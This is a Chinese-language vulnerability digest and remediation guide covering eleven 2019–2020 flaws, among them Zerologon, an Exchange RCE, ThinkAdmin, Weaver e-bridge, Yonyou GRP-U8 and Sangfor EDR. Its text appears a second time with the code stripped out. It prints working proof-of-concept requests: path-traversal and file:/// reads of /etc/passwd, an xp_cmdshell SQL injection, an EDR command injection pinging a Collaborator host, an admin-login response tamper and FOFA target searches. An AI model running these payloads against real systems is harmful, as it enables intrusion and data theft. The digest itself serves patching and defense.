重大网络行动漏洞情报整理
字数 2508 2025-08-15 21:32:00

重大网络漏洞分析与防护指南

1. NetLogon 特权提升漏洞(CVE-2020-1472)

漏洞概述

NetLogon远程协议(MS-NRPC)中存在的加密身份验证方案缺陷,CVSS评分10.0。攻击者可利用此漏洞控制域控制器并窃取域管理员凭据。

技术细节

  • 漏洞根源:Netlogon远程协议在计算机密码更新过程中的加密验证缺陷
  • 攻击方式:攻击者通过MS-NRPC连接到域控制器,获取域管理员访问权限
  • POC发布:2020年9月11日由Tom Tervoort发布漏洞白皮书及验证代码

影响范围

Windows Server多个版本:

  • Windows Server 2008 R2 SP1
  • Windows Server 2012/2012 R2
  • Windows Server 2016/2019
  • Windows Server version 1903/1909/2004
    (包括Server Core安装版本)

漏洞验证方法

  1. 获取域控DC名:
UNIQUE_NAMES = {
    b'\x00': 'Workstation Service',
    b'\x03': 'Messenger Service',
    # 其他服务映射...
}

def nbns_name(addr):
    # 通过Netbios-ns端口(137)获取计算机名
    data = b'ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01'
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(data, (addr, 137))
    rep = s.recv(2000)
    # 解析响应获取计算机名
  1. 使用验证脚本:
python3 zerologon_tester.py MASTERDC xxx.xx.xx.xx

修复方案

  1. 安装微软官方补丁:
    • 补丁链接:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472
  2. 配置自动更新:
    • 运行wscui.cpl
    • 选择"自动更新"选项
    • 设置每日或特定时间自动更新

2. Microsoft Exchange远程代码执行漏洞(CVE-2020-16875)

漏洞概述

Exchange Server中cmdlet参数验证不完善,攻击者可通过特制邮件在SYSTEM权限下执行代码。

影响版本

  • Exchange Server 2016 CU16/CU17
  • Exchange Server 2019 CU5/CU6

漏洞验证

Metasploit已集成利用模块:
https://github.com/rapid7/metasploit-framework/pull/14126

修复步骤

  1. 获取Exchange版本号:
    • 参考:https://docs.microsoft.com/zh-cn/exchange/new-features/build-numbers-and-release-dates
  2. 检查受影响状态:
    • https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875
  3. 下载对应安全更新包

3. Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)

漏洞概述

ThinkAdmin后台管理系统(基于ThinkPHP)存在路径遍历漏洞,攻击者可通过GET请求编码参数读取服务器任意文件。

影响版本

≤ 2020.08.03.01版本

漏洞验证

  1. FOFA搜索:
    "ThinkAdmin" && title=="系统登录 · ThinkAdmin"
    
  2. 利用POC:
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D
  1. 获取版本信息:
https://xxxxx/admin.html?s=admin/api.Update/version

漏洞成因

Update.php中的函数方法未授权,可直接调用:

// app/admin/controller/api/Update.php
// 未授权函数导致漏洞

修复方案

升级到安全版本,参考:
https://github.com/zoujingli/ThinkAdmin/issues/244

4. 泛微云桥e-bridge目录遍历/文件读取漏洞

漏洞概述

通过/wxjsapi/saveYZJFile接口读取文件并保存,再通过/file/fileNoLogin/{id}读取文件内容。

影响版本

2018-2019版本

漏洞验证

  1. 保存文件:
    /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
    
  2. 读取文件:
    • 从响应中提取id
    • 访问/file/fileNoLogin/{id}

测试路径

paths = {
    "linux": "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt",
    "windows": "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt"
}

修复方案

尽快升级到最新版本

5. 用友GRP-U8 SQL注入漏洞

漏洞概述

GRP-U8行政事业内控管理软件存在SQL注入漏洞,可导致命令执行。

漏洞验证

  1. FOFA搜索:
    "用友GRP-u8"
    
  2. 利用POC:
POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

修复方案

联系用友官方获取安全升级方案

6. 齐治堡垒机远程命令执行漏洞(CNVD-2019-20835)

漏洞概述

齐治运维堡垒机服务端存在命令执行漏洞,攻击者可获取服务器权限。

修复方案

  1. 更新至最新补丁
  2. 联系齐治科技技术支持

参考:

  • https://www.shuzhiduo.com/A/Vx5MZkj3dN/
  • https://www.cnvd.org.cn/flaw/show/1632201

7. 绿盟UTS综合威胁探针管理员任意登录漏洞

漏洞概述

V2.0R00F02SP02及之前版本存在管理员任意登录漏洞。

漏洞验证

  1. 使用admin登录并抓包
  2. 修改响应包:
    • {"status":false改为{"status":true
  3. 获取admin密码MD5值并登录

修复方案

升级至V2.0R00F02SP02以上版本:
http://update.nsfocus.com/update/listBsaUtsDetail/v/F02

8. 天融信数据防泄漏系统越权漏洞

漏洞概述

可越权修改管理员密码(2020年8月17日情报)

9. 深信服EDR远程命令执行漏洞

影响版本

<3.2.21

利用POC

POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1

{"params": "w=1\"'test'\"|ping n5tcbkdcgf8hlj7xjc7578yau10soh.burpcollaborator.net"}

10. 宝塔面板未授权访问漏洞

影响版本

  • Linux 7.4.2
  • Linux测试版7.5.14
  • Windows 6.8

漏洞验证

直接访问888端口的pma目录

修复方案

  • Linux升级到7.4.3或测试版7.5.15
  • Windows升级到6.9.0
    参考:https://www.bt.cn/bbs/thread-54666-1-1.html

11. Spring Cloud Netflix Hystrix Dashboard SSRF

影响版本

  • 2.2.0-2.2.3
  • 2.1.0-2.1.5

漏洞验证

/proxy.stream?origin=http://www.baidu.com

修复方案

升级到:

  • 2.2.4+ (2.2.x分支)
  • 2.1.6+ (2.1.x分支)

综合防护建议

  1. 及时更新:所有系统保持最新安全补丁
  2. 最小权限:服务账户使用最小必要权限
  3. 网络隔离:关键系统(如域控)进行网络隔离
  4. 日志监控:加强安全日志收集与分析
  5. 漏洞扫描:定期进行漏洞扫描与渗透测试
  6. 应急响应:建立漏洞应急响应流程
重大网络漏洞分析与防护指南 1. NetLogon 特权提升漏洞(CVE-2020-1472) 漏洞概述 NetLogon远程协议(MS-NRPC)中存在的加密身份验证方案缺陷,CVSS评分10.0。攻击者可利用此漏洞控制域控制器并窃取域管理员凭据。 技术细节 漏洞根源 :Netlogon远程协议在计算机密码更新过程中的加密验证缺陷 攻击方式 :攻击者通过MS-NRPC连接到域控制器,获取域管理员访问权限 POC发布 :2020年9月11日由Tom Tervoort发布漏洞白皮书及验证代码 影响范围 Windows Server多个版本: Windows Server 2008 R2 SP1 Windows Server 2012/2012 R2 Windows Server 2016/2019 Windows Server version 1903/1909/2004 (包括Server Core安装版本) 漏洞验证方法 获取域控DC名: 使用验证脚本: 修复方案 安装微软官方补丁: 补丁链接:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 配置自动更新: 运行 wscui.cpl 选择"自动更新"选项 设置每日或特定时间自动更新 2. Microsoft Exchange远程代码执行漏洞(CVE-2020-16875) 漏洞概述 Exchange Server中cmdlet参数验证不完善,攻击者可通过特制邮件在SYSTEM权限下执行代码。 影响版本 Exchange Server 2016 CU16/CU17 Exchange Server 2019 CU5/CU6 漏洞验证 Metasploit已集成利用模块: https://github.com/rapid7/metasploit-framework/pull/14126 修复步骤 获取Exchange版本号: 参考:https://docs.microsoft.com/zh-cn/exchange/new-features/build-numbers-and-release-dates 检查受影响状态: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875 下载对应安全更新包 3. Thinkadmin v6任意文件读取漏洞(CVE-2020-25540) 漏洞概述 ThinkAdmin后台管理系统(基于ThinkPHP)存在路径遍历漏洞,攻击者可通过GET请求编码参数读取服务器任意文件。 影响版本 ≤ 2020.08.03.01版本 漏洞验证 FOFA搜索: 利用POC: 获取版本信息: 漏洞成因 Update.php 中的函数方法未授权,可直接调用: 修复方案 升级到安全版本,参考: https://github.com/zoujingli/ThinkAdmin/issues/244 4. 泛微云桥e-bridge目录遍历/文件读取漏洞 漏洞概述 通过 /wxjsapi/saveYZJFile 接口读取文件并保存,再通过 /file/fileNoLogin/{id} 读取文件内容。 影响版本 2018-2019版本 漏洞验证 保存文件: 读取文件: 从响应中提取id 访问 /file/fileNoLogin/{id} 测试路径 修复方案 尽快升级到最新版本 5. 用友GRP-U8 SQL注入漏洞 漏洞概述 GRP-U8行政事业内控管理软件存在SQL注入漏洞,可导致命令执行。 漏洞验证 FOFA搜索: 利用POC: 修复方案 联系用友官方获取安全升级方案 6. 齐治堡垒机远程命令执行漏洞(CNVD-2019-20835) 漏洞概述 齐治运维堡垒机服务端存在命令执行漏洞,攻击者可获取服务器权限。 修复方案 更新至最新补丁 联系齐治科技技术支持 参考: https://www.shuzhiduo.com/A/Vx5MZkj3dN/ https://www.cnvd.org.cn/flaw/show/1632201 7. 绿盟UTS综合威胁探针管理员任意登录漏洞 漏洞概述 V2.0R00F02SP02及之前版本存在管理员任意登录漏洞。 漏洞验证 使用admin登录并抓包 修改响应包: 将 {"status":false 改为 {"status":true 获取admin密码MD5值并登录 修复方案 升级至V2.0R00F02SP02以上版本: http://update.nsfocus.com/update/listBsaUtsDetail/v/F02 8. 天融信数据防泄漏系统越权漏洞 漏洞概述 可越权修改管理员密码(2020年8月17日情报) 9. 深信服EDR远程命令执行漏洞 影响版本 <3.2.21 利用POC 10. 宝塔面板未授权访问漏洞 影响版本 Linux 7.4.2 Linux测试版7.5.14 Windows 6.8 漏洞验证 直接访问888端口的pma目录 修复方案 Linux升级到7.4.3或测试版7.5.15 Windows升级到6.9.0 参考:https://www.bt.cn/bbs/thread-54666-1-1.html 11. Spring Cloud Netflix Hystrix Dashboard SSRF 影响版本 2.2.0-2.2.3 2.1.0-2.1.5 漏洞验证 修复方案 升级到: 2.2.4+ (2.2.x分支) 2.1.6+ (2.1.x分支) 综合防护建议 及时更新 :所有系统保持最新安全补丁 最小权限 :服务账户使用最小必要权限 网络隔离 :关键系统(如域控)进行网络隔离 日志监控 :加强安全日志收集与分析 漏洞扫描 :定期进行漏洞扫描与渗透测试 应急响应 :建立漏洞应急响应流程